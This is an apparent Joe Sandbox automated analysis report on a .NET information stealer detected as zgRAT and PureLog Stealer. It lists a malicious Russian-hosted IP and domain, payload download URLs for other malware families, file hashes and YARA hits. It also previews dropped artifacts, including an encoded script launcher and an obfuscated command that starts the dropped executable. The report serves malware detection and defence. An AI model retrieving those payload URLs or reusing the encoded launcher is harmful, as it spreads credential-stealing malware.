qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
IP:91.227.16.11
Domain:h172956.srv11.test-hf.su
Country:Russian Federation
ASN:207027
ASN Name:EXIMIUS-ASRU
Malicious:true
                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                  Analysis ID:1403873
                                                                  Start date and time:2024-03-06 09:51:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 25s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:17
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:CJF0Ri1HrG.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:622AF327A5C66CA6D6D41BF02384B590.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@18/280@2/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                   • Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                   Time | Type | Description
                                                                   09:52:32 | API Interceptor | 143881x Sleep call for process: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe modified
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   91.227.16.11 | hT7clR9Gz2.exe | malicious | DCRat, PureLog Stealer, zgRAT | h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
                                                                    | file.exe | malicious | DanaBot, SmokeLoader | h167471.srv11.test-hf.su/65.exe
                                                                    | file.exe | malicious | DanaBot, SmokeLoader | h167471.srv11.test-hf.su/65.exe
                                                                    | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
                                                                    | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
                                                                    | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
                                                                    | GyTbKONlyq.exe | malicious | Pushdo, DanaBot, SmokeLoader | h167471.srv11.test-hf.su/64.exe
                                                                    | file.exe | malicious | SmokeLoader | h167159.srv11.test-hf.su/61.exe
                                                                    | file.exe | malicious | RHADAMANTHYS, RedLine, SmokeLoader | h167159.srv11.test-hf.su/54.exe
                                                                    | file.exe | malicious | RHADAMANTHYS, RedLine, SmokeLoader | h167159.srv11.test-hf.su/54.exe
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   h172956.srv11.test-hf.su | hT7clR9Gz2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 91.227.16.11
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   EXIMIUS-ASRU | hT7clR9Gz2.exe | malicious | DCRat, PureLog Stealer, zgRAT | 91.227.16.11
                                                                    | file.exe | malicious | PrivateLoader, RedLine | 91.227.16.22
                                                                    | New_Text_Document.exe | malicious | FormBook, Lokibot, NSISDropper, RedLine | 91.227.16.22
                                                                    | http://h171008.srv22.test-hf.su/timesync.exe | malicious | Unknown | 91.227.16.22
                                                                    | file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine | 91.227.16.22
                                                                    | file.exe | malicious | Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar | 91.227.16.22
                                                                    | file.exe | malicious | LummaC Stealer, SmokeLoader | 91.227.16.22
                                                                    | file.exe | malicious | LummaC Stealer, SmokeLoader | 91.227.16.22
                                                                    | lpD7vDCZmS.exe | malicious | SmokeLoader | 91.227.16.22
                                                                    | file.exe | malicious | RedLine, SmokeLoader | 91.227.16.22
                                                                  No context
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   C:\Users\user\Desktop\AFgebewE.log | hT7clR9Gz2.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | 8G3thfOYd2.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | z28NBu7i9a.exe | malicious | DCRat |
                                                                    | fzUk1a18ai.exe | malicious | DCRat |
                                                                    | 3BZPHrgjMP.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | tQxaElvX5D.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | 4y2bJd0meT.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                    | 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Reputation:low
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):91
                                                                                      Entropy (8bit):5.13806713564821
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:gANmwXbEg9oOEE1Kf1KLK6y3KvIWHGL4AE3+Ot:FjLEJEANKLK6y6A/L4AE3+Ot
                                                                                      MD5:9E914413951F28CA613D66A082E6BDF5
                                                                                      SHA1:74C3592959853F6798A62CD735E120412D73445A
                                                                                      SHA-256:9D67C2B67E4BABB2D62C1318BD530C1706A28C7AE662CDF584DD3DA06BA8BB03
                                                                                      SHA-512:B2E17288B6A06C3AE138EFCDF02B9BFC61F7416E109FE4459B9C39B682EED0A303564BE7349E02AF15BC2EEC2C1AE6C1CB347DD7415DE49627FED6BFDF7AE2E3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:%Dto%%hCHNXIroeRQkj%..%PiEVlkkTA%"C:\PortCommon/hyperbrokerhostNetsvc.exe"%sIcFYXRKiGkqOZq%
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):223
                                                                                      Entropy (8bit):5.804094981595838
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:GXkgwqK+NkLzWbHdrFnBaORbM5nCCPF11z75RJNhs:GXkBMCzWLdhBaORbQCCNP5Rhs
                                                                                      MD5:CF90E55A446D37686CB2816D101B5BB7
                                                                                      SHA1:7385714BBDEEA11D6A430803F05A59CCD7D7E5D9
                                                                                      SHA-256:38B60ADC9820B53F1E37C5F17EFD047E523A3F1B1C0486E5FD289D58B65BB5C2
                                                                                      SHA-512:AA74811A63A82D07FAA38512D2FBF119CB4C0A35E10443372FFA153FDE1DDCAF2781C9B11E8DA9FDA8BECB138050587ADFBC57E43E964DF1FE4FB2CAF86DC86F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v X!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zKKDDZWs:KUzJxrY8HW1}c2sd2d;.}^TvWD46#sKjt?J 2{R(lOEBP!S~6ls/.2D0AAA==^#~@.
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:Clarion Developer (v2 and above) memo data
                                                                                      Category:dropped
                                                                                      Size (bytes):35
                                                                                      Entropy (8bit):4.514718016821338
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:LkWEdUFvswu:70UFvswu
                                                                                      MD5:566901FDAAE6FABE8F32D713655ADAEF
                                                                                      SHA1:80941CEA57ABA3536BE7C93D63FAA3E92438416D
                                                                                      SHA-256:96496BCB3CCFD6395904A7680934B84735F37B33E612048DB0D1AF22AEBD284F
                                                                                      SHA-512:F95D8DA4287FC61CB18DB4B9A0779910588AF4464833692A3F986B6138FC539BF334D6FE3627FE338F1FA213D79442B5B5BAC2A62C13A8F05444B86C4D19049E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:M3zis91UMQWi81CGJgHoM1GRkgu64oXHJEK
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with very long lines (709), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):709
                                                                                      Entropy (8bit):5.8945325949235405
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:onrULHhR4d329VeD3AHKM7+5TGAQNjUZkSoJvZbWvmsQdfK7whtxn:uQLBIG9Ve0HHITZQVUZDqbNfKkhrn
                                                                                      MD5:5E98D2C3028E163EC5915894E8D451DD
                                                                                      SHA1:0A7127E88FCACEEEF7A3B5F7BA7C15B6983AF97D
                                                                                      SHA-256:717BEB24B6E11E452BA626B98D1FF69CD9A7E9ED142B6689D8DBB1F50C3DCFCE
                                                                                      SHA-512:1FD1D1D7A624B7B770F3DC50029158BF3F237982C5E8B1A9405BACEB096C46FE8761FC8652ABB89285D387E5E8EB97553383CA766D0F5A3967993F72AD2D7991
                                                                                      Malicious:false
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):66
                                                                                      Entropy (8bit):5.095466990826778
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:3fmUS08yG/cAdxJAxs2se/V3:3fjayEh+rN/t
                                                                                      MD5:5BE52ADF889121B7D2813589B824954B
                                                                                      SHA1:60AB53C87D2A8346F94175893EB27E77151FC9B1
                                                                                      SHA-256:6B27A6B1788B19FFC2D2F5893DF104003E6813795DEC9CEFABC22C169AA3F9A3
                                                                                      SHA-512:320A004625D40E5722C7733C0A30831588EB498C472F73C4AFBB56AFE2D9D05F552D15A80B2ABD3E5D86D31A1CCDC73F3C1DD5FE2B95C6E58AB467C4E3BB9606
                                                                                      Malicious:false
                                                                                      Preview:YWQCLlTUWLzC1yVxh7MO4Zi2OY4qoxXaSlyezPY5blidhFSPzkuy3kI8yXxxrmqiyZ
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\TextInputHost.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\TextInputHost.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1698
                                                                                      Entropy (8bit):5.367720686892084
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                                      MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                                      SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                                      SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                                      SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
